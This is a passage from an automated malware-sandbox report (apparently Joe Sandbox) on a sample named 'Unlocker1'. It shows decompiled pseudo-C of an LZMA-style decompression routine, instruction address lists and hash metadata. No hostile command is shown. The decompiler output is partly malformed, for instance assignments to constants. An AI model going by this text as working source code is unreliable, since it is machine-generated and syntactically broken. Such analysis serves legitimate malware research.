                                                                                                                                                              												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                              												__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                              												if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                              													__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                              													__eflags = __eax;
                                                                                                                                                              												}
                                                                                                                                                              												__edx =  *(__ebp - 8);
                                                                                                                                                              												__cl =  *(__eax + __edx);
                                                                                                                                                              												__eax =  *(__ebp - 0x14);
                                                                                                                                                              												 *(__ebp - 0x5c) = __cl;
                                                                                                                                                              												 *(__eax + __edx) = __cl;
                                                                                                                                                              												__eax = __eax + 1;
                                                                                                                                                              												__edx = 0;
                                                                                                                                                              												_t415 = __eax %  *(__ebp - 0x74);
                                                                                                                                                              												__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                              												__edx = _t415;
                                                                                                                                                              												__eax =  *(__ebp - 0x68);
                                                                                                                                                              												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                              												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                                                              												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                                                                                                              												__eflags =  *(__ebp - 0x30);
                                                                                                                                                              												 *( *(__ebp - 0x68)) = __cl;
                                                                                                                                                              												 *(__ebp - 0x14) = _t415;
                                                                                                                                                              												if( *(__ebp - 0x30) > 0) {
                                                                                                                                                              													continue;
                                                                                                                                                              												} else {
                                                                                                                                                              													L81:
                                                                                                                                                              													 *(__ebp - 0x88) = 2;
                                                                                                                                                              													goto L1;
                                                                                                                                                              												}
                                                                                                                                                              											}
                                                                                                                                                              											 *(__ebp - 0x88) = 0x1c;
                                                                                                                                                              											L170:
                                                                                                                                                              											_push(0x22);
                                                                                                                                                              											_pop(_t567);
                                                                                                                                                              											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
                                                                                                                                                              											_t535 = 0;
                                                                                                                                                              											L172:
                                                                                                                                                              											return _t535;
                                                                                                                                                              									}
                                                                                                                                                              								}
                                                                                                                                                              								L171:
                                                                                                                                                              								_t535 = _t534 | 0xffffffff;
                                                                                                                                                              								goto L172;
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              						__eax =  *(__ebp - 0x50);
                                                                                                                                                              						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                              						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                                                              						__eax =  *(__ebp - 0x58);
                                                                                                                                                              						__esi = __edx + __eax;
                                                                                                                                                              						 *(__ebp - 0x54) = __esi;
                                                                                                                                                              						__ax =  *__esi;
                                                                                                                                                              						__edi = __ax & 0x0000ffff;
                                                                                                                                                              						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                              						if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                              							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                              							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                              							__cx = __ax;
                                                                                                                                                              							__cx = __ax >> 5;
                                                                                                                                                              							__eax = __eax - __ecx;
                                                                                                                                                              							__edx = __edx + 1;
                                                                                                                                                              							 *__esi = __ax;
                                                                                                                                                              							 *(__ebp - 0x50) = __edx;
                                                                                                                                                              						} else {
                                                                                                                                                              							 *(__ebp - 0x10) = __ecx;
                                                                                                                                                              							0x800 = 0x800 - __edi;
                                                                                                                                                              							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                              							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                                                              							 *__esi = __cx;
                                                                                                                                                              						}
                                                                                                                                                              						if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                              							goto L148;
                                                                                                                                                              						} else {
                                                                                                                                                              							goto L146;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					goto L1;
                                                                                                                                                              				}
                                                                                                                                                              			}








                                                                                                                                                              0x00406646
                                                                                                                                                              0x0040664c
                                                                                                                                                              0x00406657
                                                                                                                                                              0x00406657
                                                                                                                                                              0x00406659
                                                                                                                                                              0x0040662b
                                                                                                                                                              0x0040662b
                                                                                                                                                              0x0040663a
                                                                                                                                                              0x0040663e
                                                                                                                                                              0x0040663e
                                                                                                                                                              0x00406663
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406665
                                                                                                                                                              0x00406669
                                                                                                                                                              0x00406818
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406818
                                                                                                                                                              0x00406675
                                                                                                                                                              0x0040667c
                                                                                                                                                              0x00406684
                                                                                                                                                              0x00406687
                                                                                                                                                              0x0040668a
                                                                                                                                                              0x0040668a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405fa8
                                                                                                                                                              0x00405faa
                                                                                                                                                              0x00405fad
                                                                                                                                                              0x0040601e
                                                                                                                                                              0x00406021
                                                                                                                                                              0x00406024
                                                                                                                                                              0x0040602b
                                                                                                                                                              0x00406035
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406035
                                                                                                                                                              0x00405faf
                                                                                                                                                              0x00405fb3
                                                                                                                                                              0x00405fb6
                                                                                                                                                              0x00405fb8
                                                                                                                                                              0x00405fbb
                                                                                                                                                              0x00405fbe
                                                                                                                                                              0x00405fc0
                                                                                                                                                              0x00405fc3
                                                                                                                                                              0x00405fc5
                                                                                                                                                              0x00405fca
                                                                                                                                                              0x00405fcd
                                                                                                                                                              0x00405fd0
                                                                                                                                                              0x00405fd4
                                                                                                                                                              0x00405fdb
                                                                                                                                                              0x00405fde
                                                                                                                                                              0x00405fe5
                                                                                                                                                              0x00405fe9
                                                                                                                                                              0x00405ff1
                                                                                                                                                              0x00405ff1
                                                                                                                                                              0x00405ff1
                                                                                                                                                              0x00405feb
                                                                                                                                                              0x00405feb
                                                                                                                                                              0x00405feb
                                                                                                                                                              0x00405fe0
                                                                                                                                                              0x00405fe0
                                                                                                                                                              0x00405fe0
                                                                                                                                                              0x00405ff5
                                                                                                                                                              0x00405ff8
                                                                                                                                                              0x00406016
                                                                                                                                                              0x00406018
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405ffa
                                                                                                                                                              0x00405ffa
                                                                                                                                                              0x00405ffd
                                                                                                                                                              0x00406000
                                                                                                                                                              0x00406003
                                                                                                                                                              0x00406005
                                                                                                                                                              0x00406005
                                                                                                                                                              0x00406005
                                                                                                                                                              0x00406008
                                                                                                                                                              0x0040600b
                                                                                                                                                              0x0040600d
                                                                                                                                                              0x0040600e
                                                                                                                                                              0x00406011
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406011
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406247
                                                                                                                                                              0x0040624b
                                                                                                                                                              0x00406269
                                                                                                                                                              0x0040626c
                                                                                                                                                              0x00406273
                                                                                                                                                              0x00406276
                                                                                                                                                              0x00406279
                                                                                                                                                              0x0040627c
                                                                                                                                                              0x0040627f
                                                                                                                                                              0x00406282
                                                                                                                                                              0x00406284
                                                                                                                                                              0x0040628b
                                                                                                                                                              0x0040628c
                                                                                                                                                              0x0040628e
                                                                                                                                                              0x00406291
                                                                                                                                                              0x00406294
                                                                                                                                                              0x00406297
                                                                                                                                                              0x00406297
                                                                                                                                                              0x0040629c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040629c
                                                                                                                                                              0x0040624d
                                                                                                                                                              0x00406250
                                                                                                                                                              0x00406253
                                                                                                                                                              0x0040625d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004062b1
                                                                                                                                                              0x004062b5
                                                                                                                                                              0x004062d8
                                                                                                                                                              0x004062db
                                                                                                                                                              0x004062de
                                                                                                                                                              0x004062e8
                                                                                                                                                              0x004062b7
                                                                                                                                                              0x004062b7
                                                                                                                                                              0x004062ba
                                                                                                                                                              0x004062bd
                                                                                                                                                              0x004062c0
                                                                                                                                                              0x004062cd
                                                                                                                                                              0x004062d0
                                                                                                                                                              0x004062d0
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004062f4
                                                                                                                                                              0x004062f8
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004062fe
                                                                                                                                                              0x00406302
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406308
                                                                                                                                                              0x0040630a
                                                                                                                                                              0x0040630e
                                                                                                                                                              0x0040630e
                                                                                                                                                              0x00406311
                                                                                                                                                              0x00406315
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406365
                                                                                                                                                              0x00406369
                                                                                                                                                              0x00406370
                                                                                                                                                              0x00406373
                                                                                                                                                              0x00406376
                                                                                                                                                              0x00406380
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406380
                                                                                                                                                              0x0040636b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040638c
                                                                                                                                                              0x00406390
                                                                                                                                                              0x00406397
                                                                                                                                                              0x0040639a
                                                                                                                                                              0x0040639d
                                                                                                                                                              0x00406392
                                                                                                                                                              0x00406392
                                                                                                                                                              0x00406392
                                                                                                                                                              0x004063a0
                                                                                                                                                              0x004063a3
                                                                                                                                                              0x00406242
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406242
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004064cf
                                                                                                                                                              0x004064cf
                                                                                                                                                              0x004064d3
                                                                                                                                                              0x004067fa
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004067fa
                                                                                                                                                              0x004064d9
                                                                                                                                                              0x004064dc
                                                                                                                                                              0x004064df
                                                                                                                                                              0x004064e3
                                                                                                                                                              0x004064e6
                                                                                                                                                              0x004064ec
                                                                                                                                                              0x004064ee
                                                                                                                                                              0x004064ee
                                                                                                                                                              0x004064ee
                                                                                                                                                              0x004064f1
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040629f
                                                                                                                                                              0x0040629f
                                                                                                                                                              0x004062a2
                                                                                                                                                              0x00406614
                                                                                                                                                              0x00406614
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040669b
                                                                                                                                                              0x0040669f
                                                                                                                                                              0x004066bd
                                                                                                                                                              0x004066bd
                                                                                                                                                              0x004066bd
                                                                                                                                                              0x004066c4
                                                                                                                                                              0x004066cb
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004066cb
                                                                                                                                                              0x004066a1
                                                                                                                                                              0x004066a4
                                                                                                                                                              0x004066a7
                                                                                                                                                              0x004066aa
                                                                                                                                                              0x004066b1
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040678c
                                                                                                                                                              0x0040678f
                                                                                                                                                              0x00406690
                                                                                                                                                              0x00406690
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004063c6
                                                                                                                                                              0x004063c8
                                                                                                                                                              0x004063cf
                                                                                                                                                              0x004063d0
                                                                                                                                                              0x004063d2
                                                                                                                                                              0x004063d5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004063dd
                                                                                                                                                              0x004063e0
                                                                                                                                                              0x004063e3
                                                                                                                                                              0x004063e5
                                                                                                                                                              0x004063e7
                                                                                                                                                              0x004063e7
                                                                                                                                                              0x004063e8
                                                                                                                                                              0x004063eb
                                                                                                                                                              0x004063f2
                                                                                                                                                              0x004063f5
                                                                                                                                                              0x00406403
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004066e8
                                                                                                                                                              0x004066e8
                                                                                                                                                              0x004066ec
                                                                                                                                                              0x00406824
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406824
                                                                                                                                                              0x004066f2
                                                                                                                                                              0x004066f5
                                                                                                                                                              0x004066f8
                                                                                                                                                              0x004066fc
                                                                                                                                                              0x004066ff
                                                                                                                                                              0x00406705
                                                                                                                                                              0x00406707
                                                                                                                                                              0x00406707
                                                                                                                                                              0x00406707
                                                                                                                                                              0x0040670a
                                                                                                                                                              0x0040670d
                                                                                                                                                              0x0040670d
                                                                                                                                                              0x0040670d
                                                                                                                                                              0x0040670d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040640b
                                                                                                                                                              0x0040640e
                                                                                                                                                              0x00406444
                                                                                                                                                              0x00406574
                                                                                                                                                              0x00406574
                                                                                                                                                              0x00406574
                                                                                                                                                              0x00406574
                                                                                                                                                              0x00406577
                                                                                                                                                              0x00406577
                                                                                                                                                              0x0040657a
                                                                                                                                                              0x0040657c
                                                                                                                                                              0x00406806
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406806
                                                                                                                                                              0x00406582
                                                                                                                                                              0x00406585
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040658b
                                                                                                                                                              0x0040658f
                                                                                                                                                              0x00406592
                                                                                                                                                              0x00406592
                                                                                                                                                              0x00406592
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406592
                                                                                                                                                              0x00406410
                                                                                                                                                              0x00406412
                                                                                                                                                              0x00406414
                                                                                                                                                              0x00406416
                                                                                                                                                              0x00406419
                                                                                                                                                              0x0040641a
                                                                                                                                                              0x0040641c
                                                                                                                                                              0x0040641e
                                                                                                                                                              0x00406421
                                                                                                                                                              0x00406424
                                                                                                                                                              0x0040643a
                                                                                                                                                              0x0040643f
                                                                                                                                                              0x00406477
                                                                                                                                                              0x00406477
                                                                                                                                                              0x0040647b
                                                                                                                                                              0x004064a7
                                                                                                                                                              0x004064a9
                                                                                                                                                              0x004064b0
                                                                                                                                                              0x004064b3
                                                                                                                                                              0x004064b6
                                                                                                                                                              0x004064b6
                                                                                                                                                              0x004064bb
                                                                                                                                                              0x004064bb
                                                                                                                                                              0x004064bd
                                                                                                                                                              0x004064c0
                                                                                                                                                              0x004064c7
                                                                                                                                                              0x004064ca
                                                                                                                                                              0x004064f7
                                                                                                                                                              0x004064f7
                                                                                                                                                              0x004064fa
                                                                                                                                                              0x004064fd
                                                                                                                                                              0x00406571
                                                                                                                                                              0x00406571
                                                                                                                                                              0x00406571
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406571
                                                                                                                                                              0x004064ff
                                                                                                                                                              0x00406505
                                                                                                                                                              0x00406508
                                                                                                                                                              0x0040650b
                                                                                                                                                              0x0040650e
                                                                                                                                                              0x00406511
                                                                                                                                                              0x00406514

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • Opcode ID: b486484d64dd4cde6c37fee08c13c94b86683911648eeb5affe32ba80e56590e
                                                                                                                                                              • Instruction ID: 736e54d1ea8bc2ffbcc58a3ee687e8f06aed80bce92bf0dad63538ea203c4f31
                                                                                                                                                              • Opcode Fuzzy Hash: b486484d64dd4cde6c37fee08c13c94b86683911648eeb5affe32ba80e56590e
                                                                                                                                                              • Instruction Fuzzy Hash: 77913271D00229CBDF28CF98C844BADBBB1FF44305F15816AD856BB281D7789A86DF54
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 98%
                                                                                                                                                              			E004062F4() {
                                                                                                                                                              				unsigned short _t532;
                                                                                                                                                              				signed int _t533;
                                                                                                                                                              				void _t534;
                                                                                                                                                              				void* _t535;
                                                                                                                                                              				signed int _t536;
                                                                                                                                                              				signed int _t565;
                                                                                                                                                              				signed int _t568;
                                                                                                                                                              				signed int _t589;
                                                                                                                                                              				signed int* _t606;
                                                                                                                                                              				void* _t613;
                                                                                                                                                              
                                                                                                                                                              				L0:
                                                                                                                                                              				while(1) {
                                                                                                                                                              					L0:
                                                                                                                                                              					if( *(_t613 - 0x40) != 0) {
                                                                                                                                                              						L89:
                                                                                                                                                              						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
                                                                                                                                                              						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
                                                                                                                                                              						L69:
                                                                                                                                                              						_t606 =  *(_t613 - 0x58);
                                                                                                                                                              						 *(_t613 - 0x84) = 0x12;
                                                                                                                                                              						L132:
                                                                                                                                                              						 *(_t613 - 0x54) = _t606;
                                                                                                                                                              						L133:
                                                                                                                                                              						_t532 =  *_t606;
                                                                                                                                                              						_t589 = _t532 & 0x0000ffff;
                                                                                                                                                              						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                                                                                                              						if( *(_t613 - 0xc) >= _t565) {
                                                                                                                                                              							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                                                                                                              							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                                                                                                              							 *(_t613 - 0x40) = 1;
                                                                                                                                                              							_t533 = _t532 - (_t532 >> 5);
                                                                                                                                                              							 *_t606 = _t533;
                                                                                                                                                              						} else {
                                                                                                                                                              							 *(_t613 - 0x10) = _t565;
                                                                                                                                                              							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                                                              							 *_t606 = (0x800 - _t589 >> 5) + _t532;
                                                                                                                                                              						}
                                                                                                                                                              						if( *(_t613 - 0x10) >= 0x1000000) {
                                                                                                                                                              							L139:
                                                                                                                                                              							_t534 =  *(_t613 - 0x84);
                                                                                                                                                              							L140:
                                                                                                                                                              							 *(_t613 - 0x88) = _t534;
                                                                                                                                                              							goto L1;
                                                                                                                                                              						} else {
                                                                                                                                                              							L137:
                                                                                                                                                              							if( *(_t613 - 0x6c) == 0) {
                                                                                                                                                              								 *(_t613 - 0x88) = 5;
                                                                                                                                                              								goto L170;
                                                                                                                                                              							}
                                                                                                                                                              							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                                                                                                                              							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                                                              							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                                                              							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                                                                                              							goto L139;
                                                                                                                                                              						}
                                                                                                                                                              					} else {
                                                                                                                                                              						if( *(__ebp - 0x60) == 0) {
                                                                                                                                                              							L171:
                                                                                                                                                              							_t536 = _t535 | 0xffffffff;
                                                                                                                                                              							L172:
                                                                                                                                                              							return _t536;
                                                                                                                                                              						}
                                                                                                                                                              						__eax = 0;
                                                                                                                                                              						_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                                                                                              						0 | _t258 = _t258 + _t258 + 9;
                                                                                                                                                              						 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                                                                                                              						L75:
                                                                                                                                                              						if( *(__ebp - 0x64) == 0) {
                                                                                                                                                              							 *(__ebp - 0x88) = 0x1b;
                                                                                                                                                              							L170:
                                                                                                                                                              							_t568 = 0x22;
                                                                                                                                                              							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                                                                                                                              							_t536 = 0;
                                                                                                                                                              							goto L172;
                                                                                                                                                              						}
                                                                                                                                                              						__eax =  *(__ebp - 0x14);
                                                                                                                                                              						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                              						if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                              							__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                              						}
                                                                                                                                                              						__edx =  *(__ebp - 8);
                                                                                                                                                              						__cl =  *(__eax + __edx);
                                                                                                                                                              						__eax =  *(__ebp - 0x14);
                                                                                                                                                              						 *(__ebp - 0x5c) = __cl;
                                                                                                                                                              						 *(__eax + __edx) = __cl;
                                                                                                                                                              						__eax = __eax + 1;
                                                                                                                                                              						__edx = 0;
                                                                                                                                                              						_t274 = __eax %  *(__ebp - 0x74);
                                                                                                                                                              						__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                              						__edx = _t274;
                                                                                                                                                              						__eax =  *(__ebp - 0x68);
                                                                                                                                                              						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                                                              						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                              						_t283 = __ebp - 0x64;
                                                                                                                                                              						 *_t283 =  *(__ebp - 0x64) - 1;
                                                                                                                                                              						 *( *(__ebp - 0x68)) = __cl;
                                                                                                                                                              						L79:
                                                                                                                                                              						 *(__ebp - 0x14) = __edx;
                                                                                                                                                              						L80:
                                                                                                                                                              						 *(__ebp - 0x88) = 2;
                                                                                                                                                              					}
                                                                                                                                                              					L1:
                                                                                                                                                              					_t535 =  *(_t613 - 0x88);
                                                                                                                                                              					if(_t535 > 0x1c) {
                                                                                                                                                              						goto L171;
                                                                                                                                                              					}
                                                                                                                                                              					switch( *((intOrPtr*)(_t535 * 4 +  &M0040684B))) {
                                                                                                                                                              						case 0:
                                                                                                                                                              							if( *(_t613 - 0x6c) == 0) {
                                                                                                                                                              								goto L170;
                                                                                                                                                              							}
                                                                                                                                                              							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                                                              							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                                                              							_t535 =  *( *(_t613 - 0x70));
                                                                                                                                                              							if(_t535 > 0xe1) {
                                                                                                                                                              								goto L171;
                                                                                                                                                              							}
                                                                                                                                                              							_t539 = _t535 & 0x000000ff;
                                                                                                                                                              							_push(0x2d);
                                                                                                                                                              							asm("cdq");
                                                                                                                                                              							_pop(_t570);
                                                                                                                                                              							_push(9);
                                                                                                                                                              							_pop(_t571);
                                                                                                                                                              							_t609 = _t539 / _t570;
                                                                                                                                                              							_t541 = _t539 % _t570 & 0x000000ff;
                                                                                                                                                              							asm("cdq");
                                                                                                                                                              							_t604 = _t541 % _t571 & 0x000000ff;
                                                                                                                                                              							 *(_t613 - 0x3c) = _t604;
                                                                                                                                                              							 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                                                                                                                              							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
                                                                                                                                                              							_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                                                                                                                              							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                                                                                                                              								L10:
                                                                                                                                                              								if(_t612 == 0) {
                                                                                                                                                              									L12:
                                                                                                                                                              									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                                                                                                                              									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                                                              									goto L15;
                                                                                                                                                              								} else {
                                                                                                                                                              									goto L11;
                                                                                                                                                              								}
                                                                                                                                                              								do {
                                                                                                                                                              									L11:
                                                                                                                                                              									_t612 = _t612 - 1;
                                                                                                                                                              									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                                                                                                                              								} while (_t612 != 0);
                                                                                                                                                              								goto L12;
                                                                                                                                                              							}
                                                                                                                                                              							if( *(_t613 - 4) != 0) {
                                                                                                                                                              								GlobalFree( *(_t613 - 4)); // executed
                                                                                                                                                              							}
                                                                                                                                                              							_t535 = GlobalAlloc(0x40, 0x600); // executed
                                                                                                                                                              							 *(_t613 - 4) = _t535;
                                                                                                                                                              							if(_t535 == 0) {
                                                                                                                                                              								goto L171;
                                                                                                                                                              							} else {
                                                                                                                                                              								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                                                                                                                              								goto L10;
                                                                                                                                                              							}
                                                                                                                                                              						case 1:
                                                                                                                                                              							L13:
                                                                                                                                                              							__eflags =  *(_t613 - 0x6c);
                                                                                                                                                              							if( *(_t613 - 0x6c) == 0) {
                                                                                                                                                              								 *(_t613 - 0x88) = 1;
                                                                                                                                                              								goto L170;
                                                                                                                                                              							}
                                                                                                                                                              							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                                                              							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                                                                                                                              							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                                                              							_t45 = _t613 - 0x48;
                                                                                                                                                              							 *_t45 =  *(_t613 - 0x48) + 1;
                                                                                                                                                              							__eflags =  *_t45;
                                                                                                                                                              							L15:
                                                                                                                                                              							if( *(_t613 - 0x48) < 4) {
                                                                                                                                                              								goto L13;
                                                                                                                                                              							}
                                                                                                                                                              							_t547 =  *(_t613 - 0x40);
                                                                                                                                                              							if(_t547 ==  *(_t613 - 0x74)) {
                                                                                                                                                              								L20:
                                                                                                                                                              								 *(_t613 - 0x48) = 5;
                                                                                                                                                              								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                                                                                                                              								goto L23;
                                                                                                                                                              							}
                                                                                                                                                              							 *(_t613 - 0x74) = _t547;
                                                                                                                                                              							if( *(_t613 - 8) != 0) {
                                                                                                                                                              								GlobalFree( *(_t613 - 8)); // executed
                                                                                                                                                              							}
                                                                                                                                                              							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                                                                                                                              							 *(_t613 - 8) = _t535;
                                                                                                                                                              							if(_t535 == 0) {
                                                                                                                                                              								goto L171;
                                                                                                                                                              							} else {
                                                                                                                                                              								goto L20;
                                                                                                                                                              							}
                                                                                                                                                              						case 2:
                                                                                                                                                              							L24:
                                                                                                                                                              							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                                                                                                                              							 *(_t613 - 0x84) = 6;
                                                                                                                                                              							 *(_t613 - 0x4c) = _t554;
                                                                                                                                                              							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
                                                                                                                                                              							goto L132;
                                                                                                                                                              						case 3:
                                                                                                                                                              							L21:
                                                                                                                                                              							__eflags =  *(_t613 - 0x6c);
                                                                                                                                                              							if( *(_t613 - 0x6c) == 0) {
                                                                                                                                                              								 *(_t613 - 0x88) = 3;
                                                                                                                                                              								goto L170;
                                                                                                                                                              							}
                                                                                                                                                              							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                                                              							_t67 = _t613 - 0x70;
                                                                                                                                                              							 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                                                                                                                              							__eflags =  *_t67;
                                                                                                                                                              							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                                                                                              							L23:
                                                                                                                                                              							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                                                                                                                              							if( *(_t613 - 0x48) != 0) {
                                                                                                                                                              								goto L21;
                                                                                                                                                              							}
                                                                                                                                                              							goto L24;
                                                                                                                                                              						case 4:
                                                                                                                                                              							goto L133;
                                                                                                                                                              						case 5:
                                                                                                                                                              							goto L137;
                                                                                                                                                              						case 6:
                                                                                                                                                              							__edx = 0;
                                                                                                                                                              							__eflags =  *(__ebp - 0x40);
                                                                                                                                                              							if( *(__ebp - 0x40) != 0) {
                                                                                                                                                              								__eax =  *(__ebp - 4);
                                                                                                                                                              								__ecx =  *(__ebp - 0x38);
                                                                                                                                                              								 *(__ebp - 0x34) = 1;
                                                                                                                                                              								 *(__ebp - 0x84) = 7;
                                                                                                                                                              								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                                                                                              								goto L132;
                                                                                                                                                              							}
                                                                                                                                                              							__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                                                                                              							__esi =  *(__ebp - 0x60);
                                                                                                                                                              							__cl = 8;
                                                                                                                                                              							__cl = 8 -  *(__ebp - 0x3c);
                                                                                                                                                              							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                                                                                              							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                                                                                              							__ecx =  *(__ebp - 0x3c);
                                                                                                                                                              							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                                                                                              							__ecx =  *(__ebp - 4);
